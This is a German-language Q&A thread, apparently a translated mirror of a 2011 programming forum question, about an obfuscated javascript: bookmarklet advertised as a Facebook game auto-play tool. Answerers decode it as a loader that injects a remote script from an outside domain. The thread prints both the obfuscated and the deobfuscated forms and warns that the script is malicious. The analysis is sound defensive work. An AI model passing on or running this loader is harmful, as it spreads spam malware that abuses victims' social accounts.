9 Stimmen

mbuhasu avatar

Kann jemand dieses javascript entschlüsseln

Gefragt el 2 de Juli, 2011
Wann wurde die Frage gestellt
5394 Ansichten
Anzahl der Besuche der Frage
5 Antworten
Anzahl der Fragenantworten
Gelöst
Aktueller Status der Frage

Ich fand es in einem Forum, das mir sagt, dass dieser Code würde mir Auto-Play für Facebook-Spiele, aber ich fürchte, dass dies nicht das ist, was sie sagen, im Angst, dass dies bösartige Skript

bitte helfen :)

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
Gefragt el 2 de Juli, 2011 von mbuhasu

Antworten

Zu viele Anzeigen?

12voto

Guffa avatar
Guffa Punkte 663241

Beginnen wir mit der Dekodierung der Escape-Sequenzen und beseitigen wir diese _0x8dd5 Name der Variablen:

var x=[
  "src","script","createElement","http://ug-radio.co.cc/flood.js",
  "appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);

Wenn Sie die Zeichenfolge aus dem Array ersetzen, erhalten Sie folgendes Ergebnis:

(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);

Was das Skript also tut, ist ganz einfach:

a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);

D.h. es lädt das Javascript http://ug-radio.co.cc/flood.js auf der Seite.

Wenn man sich das Skript in der geladenen Datei ansieht, nennt es sich "Wallflood By X-Cisadane". Es scheint eine Liste Ihrer Freunde zu erhalten und eine Nachricht an alle (oder vielleicht von allen) zu senden.

Das hat sicher nichts mit der automatischen Wiedergabe von Spielen zu tun.

Beantwortet el 2 de Juli, 2011 von Guffa (663241 Punkte )

7voto

Spudley avatar
Spudley Punkte 161296

Ich öffnete Firebug und fügte einen Teil des Skripts in die Konsole ein (wobei ich darauf achtete, nur den Teil einzufügen, der eine Variable erstellte, und nicht den laufenden Code). Dies ist, was ich bekam:

was ich eingefügt habe:

console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);

das Ergebnis:

["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]

Kurz gesagt, es handelt sich um ein Skript zum Laden einer externen Javascript-Datei von einem entfernten Server mit einem sehr zweifelhaft aussehenden Domänennamen.

Es gibt ein paar Zeichen, die nicht ganz so umgesetzt werden, wie man es erwarten würde. Dabei könnte es sich um Tippfehler handeln (unwahrscheinlich) oder um eine absichtliche weitere Verschleierung, um automatische Malware-Checker zu täuschen, die nach Skripten mit URLs oder Verweisen auf createElement , usw. Der Rest des Skripts fügt diese Zeichen einzeln wieder ein, bevor es ausgeführt wird.

Der Name der Variablen _0x8dd5 wird gewählt, um siehe wie Hex-Code und machen das Ganze schwerer zu lesen, aber in Wirklichkeit ist es nur ein normaler Javascript-Variablenname. Im Rest des Skripts wird immer wieder darauf verwiesen, wenn Zeichen von einem Teil der Zeichenfolge in einen anderen kopiert werden, um die absichtlichen Lücken zu schließen.

Eindeutig ein bösartiges Skript.

Ich empfehle, sie sofort zu verbrennen! ;-)

Beantwortet el 2 de Juli, 2011 von Spudley (161296 Punkte )

4voto

Ionuț G. Stan avatar
Ionuț G. Stan Punkte 168218

Nun, die deklarierte Variable ist eigentlich diese:

var _0x8dd5= [
    'src', 'script', 'cx7 2eateElement',
    'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];

Der Rest ist leicht herauszufinden.

Beantwortet el 2 de Juli, 2011 von Ionuț G. Stan (168218 Punkte )

1voto

aroth avatar
aroth Punkte 52778

Nun, Ihre erste Anweisung ist die Einrichtung eines Arrays mit ungefähr dem folgenden Inhalt:

var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];

Ich sage "ungefähr", weil ich die JavaScript-Konsole von Chrome verwende, um die Daten zu analysieren, und einige Dinge scheinen ein wenig verstümmelt zu sein. Ich habe die verstümmelten Teile so gut ich kann bereinigt.

Der Rest scheint in etwa so zu lauten:

var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);

Im Grunde wird also ein (wahrscheinlich bösartiges) Skript in das Dokument eingefügt.

Beantwortet el 2 de Juli, 2011 von aroth (52778 Punkte )

1voto

Murali VP avatar
Murali VP Punkte 5788

Wahrscheinlich wissen Sie, wie man es entschlüsselt oder wie es kodiert wurde, aber für diejenigen, die sich nicht sicher sind, ist es nichts anderes als eine zweistellige hexadezimale Escape-Sequenz. Es könnte auch eine 4-stellige sein mit \udddd (z. B. " \u0032 " ist "2") oder \ddd für oktal.

Dekodierung der Hex-Zeichenkette in Javascript

Beantwortet el 2 de Juli, 2011 von Murali VP (5788 Punkte )

Verwandte Fragen

Empfohlene Fragen

Top-Tags

CodeJaeger.com

CodeJaeger ist eine Gemeinschaft für Programmierer, die täglich Hilfe erhalten..
Wir haben viele Inhalte, und Sie können auch Ihre eigenen Fragen stellen oder die Fragen anderer Leute lösen.

Powered by:

Yandex
X